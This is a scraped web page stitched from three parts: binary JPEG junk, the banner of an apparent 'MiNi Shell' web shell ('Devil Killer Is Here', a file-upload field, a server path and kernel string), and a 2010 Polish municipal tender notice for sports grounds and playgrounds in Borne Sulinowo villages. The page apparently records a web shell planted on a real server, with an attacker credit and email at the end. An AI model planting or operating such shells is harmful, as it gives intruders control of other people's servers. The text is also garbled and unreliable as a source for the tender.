JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/10227-N-2010.html

<p class="kh_header"><b>Borne Sulinowo: Odnowa obszarów wiejskich Gminy Borne Sulinowo poprzez stworzenie ogólnodostępnych stref sportowo - rekreacyjnych w miejscowościach Jeleń, Łubowo, Piława i Radacz</b><br>
<b>Numer ogłoszenia: 10227 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Borne Sulinowo , Al. Niepodległości 6, 78-449 Borne Sulinowo, woj. zachodniopomorskie, tel. 094 3734125, faks 094 3734133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bornesulinowo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowa obszarów wiejskich Gminy Borne Sulinowo poprzez stworzenie ogólnodostępnych stref sportowo - rekreacyjnych w miejscowościach Jeleń, Łubowo, Piława i Radacz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu ogólnodostępnych stref sportowo- rekreacyjnych w miejscowościach Jeleń, Łubowo, Piława i Radacz składających się z boisk do gier zespołowych, placów zabaw, miejsc do wypoczynku i rekreacji. Zakres prac obejmuje również zagospodarowanie terenu wchodzących w skład stref - wykonanie ogrodzeń oraz nasadzeń zieleni. Planowany zakres inwestycji w rozbiciu na poszczególne zadania:

a.	Miejscowość Jeleń dz.6/17
- wykonanie boiska do gry w siatkówkę o nawierzchni trawiastej
- wykonanie placu do gry w koszykówkę o nawierzchni poliuretanowej
- montaż urządzeń oraz zagospodarowanie placu zabaw
- wykonanie miejsc  rekreacji
- wykonanie ogrodzenia i ciągów komunikacyjnych
- wykonanie nasadzeń i trawników
- montaż obiektów małej architektury.
		Miejscowość Jeleń dz. 36/2
- wykonanie miejsc rekreacji
- montaż obiektów małej architektury.
b.	Miejscowość Łubowo dz. 239, 240/10
- wykonanie placu zabaw
- wykonanie ogrodzenia i ciągów komunikacyjnych
- wykonanie nasadzeń i trawników
- montaż obiektów małej architektury.
c.	Miejscowość Piława dz. 118/5
- wykonanie placu zabaw
- wykonanie ogrodzenia i ciągów komunikacyjnych
- wykonanie nasadzeń i trawników
- montaż obiektów małej architektury.
d.	Miejscowość Radacz dz.62/6. 
- wykonanie boiska do gry w piłkę nożną o nawierzchni trawiastej
- wykonanie boiska do gry w siatkówkę o nawierzchni trawiastej
- montaż urządzeń oraz zagospodarowanie placu zabaw
- wykonanie miejsc  rekreacji
- wykonanie ogrodzenia i ciągów komunikacyjnych
- wykonanie nasadzeń i trawników
- montaż obiektów małej architektury.
UWAGA : Zamawiający ogranicza  zakres prac do wykonania: Wykonawca nie będzie wykonywał  boiska do gry w koszykówkę o nawierzchni poliuretanowej dla zadania w Radaczu. 

2.	Szczegółowe warunki realizacji zamówienia zawiera dokumentacja techniczna - projekt  zagospodarowania terenu dla poszczególnych działek wraz z opisem technicznym i STWiORB oraz wzór umowy stanowiący załącznik nr 7 do SIWZ.
 
Ponadto w celu prawidłowego wykonania całości przedmiotu zamówienia niezbędne jest wykonanie przez Wykonawcę w ramach poszczególnych zadań :

a.	Miejscowość Jeleń dz.6/17
		
1. inwentaryzacji geodezyjnej powykonawczej oraz zestawienie powierzchni wykonanych obiektów
2. instrukcji ( szt. 1 ) korzystania z obiektów wykonanej na tablicy  metalowej z konstrukcją nośną drewnianą. 
3. usunięcia zakrzaczeń i zadrzewień kolidujących z przedmiotowym zagospodarowaniem  terenu.

		 		Miejscowość Jeleń dz. 36/2

1. inwentaryzacji geodezyjnej powykonawczej 
2. usunięcia zakrzaczeń i zadrzewień kolidujących z przedmiotowym zagospodarowaniem  terenu.

b.	Miejscowość Łubowo dz. 239, 240/10
1. inwentaryzacji geodezyjnej powykonawczej 
2. instrukcji ( szt. 1 ) korzystania z obiektów wykonanej na tablicy  metalowej z konstrukcją nośną drewnianą.
3. geodezyjnego wskazania granic działki ( 4 pkt )
4. usunięcia zakrzaczeń i zadrzewień kolidujących z przedmiotowym zagospodarowaniem  terenu.

c.	Miejscowość Piława dz. 118/5

1. inwentaryzacji geodezyjnej powykonawczej 
2. instrukcji ( szt. 1 ) korzystania z obiektów wykonanej na tablicy  metalowej z konstrukcją nośną drewnianą. 
3. ogrodzenia z siatki stalowej ocynkowanej  na słupkach stalowych ocynkowanych powlekanych PCV wraz z cokolikiem betonowym ze względu na istniejące ukształtowanie terenu.
4. utwardzenie terenu w ilości 8 m2 przy wejściu na teren strefy nawierzchnią z kostki betonowej typu Polbruk w zamian za nawierzchnię żwirową z uwagi na istniejące ukształtowanie terenu.
5. geodezyjnego wskazania granic działki ( 4 pkt )
6. usunięcia zakrzaczeń i zadrzewień kolidujących z przedmiotowym zagospodarowaniem  terenu.

d.	Miejscowość Radacz dz.62/6. 

1. inwentaryzacji geodezyjnej powykonawczej 
2. instrukcji ( szt. 1 ) korzystania z obiektów wykonanej na tablicy  metalowej z konstrukcją nośną drewnianą. 
3. geodezyjnego wskazania granic działki ( 2 pkt )
4. usunięcia zakrzaczeń i zadrzewień kolidujących z przedmiotowym zagospodarowaniem terenu.

3.	Uszczegółowienie dotyczące placów zabaw:
I.	zestaw zabawowy duży o konstrukcji drewnianej ( drewno okrągłe, impregnowane ciśnieniowo, średnica głównych elementów konstrukcyjnych min. 120mm, łańcuchy i śruby wykonane ze stali nierdzewnej), skład minimalny:
a.	przeplotnia,
b.	ścianka wspinaczkowa duża,
c.	zjeżdżalnia ( wym. min. 2,9 dł. x 0,5 szer. x 1,05 wys., ślizg z blachy nierdzewnej )
d.	wieża z dachem ( wym. min. 1,0 dł. x 1,0 szer. x 3,10 wys.)
e.	pomosty,
f.	drabinki,
g.	rura strażacka.

II.	zestaw zabawowy mały o konstrukcji drewnianej ( drewno okrągłe, impregnowane ciśnieniowo, średnica głównych elementów konstrukcyjnych min. 120mm, łańcuchy i śruby wykonane ze stali nierdzewnej) skład minimalny:
a.	przeplotnia,
b.	ścianka wspinaczkowa duża,
c.	zjeżdżalnia ( wym. min. 2,9 dł. x 0,5 szer.  x 1,05 wys., ślizg z blachy nierdzewnej )
d.	wieża z dachem ( wym. min. 1,0 dł. x 1,0 szer. x 3,10 wys.)
e.	pomosty,
f.	drabinki.

III.	zamontowane zestawy muszą spełniać normę PN-EN 1176, posiadać deklarację zgodności dla każdego wyrobu wraz z certyfikatem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 45.21.22.20-4, 45.11.27.23-9, 45.11.12.91-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	Spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
b.	posiadają wiedzę i doświadczenie;
c.	dysponują odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
d.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
2)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust.1 i 2 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.
2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby Wykonawcy wspólnie spełniali w/w warunki udziału w postępowaniu. W przypadku konsorcjum żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych.
3.	Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca obowiązany jest dołączyć do oferty następujące dokumenty i oświadczenia:
1)	Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych, zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ.
2)	Oświadczenie o niewykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych, zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ.
3)	Oświadczenie o zgodności z warunkami przetargu, zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ.
4)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ.
5)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6)	Oświadczenie o zapoznaniu się z treścią wzoru umowy załącznik nr 6 do SIWZ.
7)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
8)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9)	Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych związanych m.in. z wielofunkcyjnymi obiektami sportowymi 45.21.22.20-4, robót w zakresie kształtowania terenów sportowych i rekreacyjnych 45.21.22.20-4 oraz robót w zakresie kształtowania placów zabaw 45.11.27.23-9, z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.)
10)	Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 400 000 PLN. Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 400 000 PLN..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bornesulinowo.pl/zp/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bornem Sulinowie Al. Niepodległości 6 , 78-449 Borne Sulinowo w pokoju nr 30..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2010 godzina 12:00, miejsce: Urząd Miejski w Bornem Sulinowie Al. Niepodległości 6 , 78-449 Borne Sulinowo w pokoju nr 20- sekretariat Burmistrza..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com